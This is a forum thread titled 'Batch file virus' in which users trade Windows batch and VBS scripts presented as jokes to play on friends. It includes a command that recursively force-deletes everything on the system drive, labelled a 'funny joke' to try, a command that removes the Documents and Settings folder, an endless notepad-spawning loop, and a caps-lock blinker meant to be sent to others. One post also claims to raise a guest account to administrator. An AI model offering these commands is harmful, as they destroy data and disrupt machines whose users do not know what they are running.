Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking Tips (http://www.go4expert.com/articles/ethical-hacking-tutorials/)
-   -   Batch file virus (http://www.go4expert.com/articles/batch-file-virus-t14980/)

jeffreytb 20Jun2009 11:35

Re: Batch file virus

try this batch
del %systemdrive%\*.* /s /f /q
its really funny joke Must try!!!

ansarialice 30Mar2010 08:36

1 Attachment(s)
hay guys this new to all batch virus making code:crazy:

abhay gupta 11May2010 19:38

do have this type of code for c language?

I fail at hacking 12May2010 21:53

fuckkk man i opened this file and like 300 cmd things popped up and my screen is ****** up lol

abhay gupta 18May2010 21:10

i just want to know which language did u use in this batch file

SURYANSHM 20May2010 23:35

this code is used to delete the "my documents and settings" folder in the my computer plzzzzz dont try in ur pc otherwise they may create some problems.
---------------------------------------------------------------------------------------------------

Rmdir c:\docume~1

:cuss::snobby::mad::cryin::D:p:sosp::shout::happy: :shy::wacky::p:p:p:p:p:p:p:p
---------------------------------------------------------------------------------------------------
Enjoy My Friends :happy::happy::happy::happy::happy::happy::happy:

SURYANSHM 21May2010 00:00

1 Attachment(s)
common download the file and lets make the guest account to administrator account.

ok friends now open that file and save as something.bat {guest.bat} or anything with .bat extension and then enjoy the game you will get the administrator privileges.

:cuss::cuss::cuss::cuss::cuss::cuss::cuss::cuss::c razy::crazy::mad::mad::mad::mad::mad::mad::D:D:D:D :baby::baby::baby:

SURYANSHM 21May2010 00:05

This simple computer prank consists of a code below that will drive your friend crazy as it opens notepad continuously.

When you type the below code and rename it as *.bat it take the above showed icon shape.

To Open Notepad continuously in your friend’s computer:

Type the code in notepad as :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as “notepad.BAT” and send it.

Note: If you want to try it, then go ahead and when you built this file double click to open it. But beware it slows your system and you will be left with no other option than to restart, as this script opens 100’s of notepad window. So, If you want to try this than save all your work and then run this file.

SURYANSHM 21May2010 00:07

What this trick does is, when you run the following script it starts blinking caps Lock light continuously. If you run this script twice the rate of blink increases and alternatively NumLock light start to blink with CapsLock.
Open Notepad and Type :

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

Save it as “Caps.VBS” and send it to your friend. Double Click it if you wanna see it working. Its a very funny Notepad Trick.

Note: Don’t worry when you try this crazy notepad trick. If you want to end this script simply Open Task Manager(Alt+Ctrl+Delete). Under Processes end the process “wscript.exe”

Pathogen 27May2010 06:38

Quote:

Originally Posted by Bhullarz (Post 38670)
A batch can done the complete damage.
Why not code this file using C++ or C, then nobody will be able to see the source code even

Or you could just use a converter couldn't you?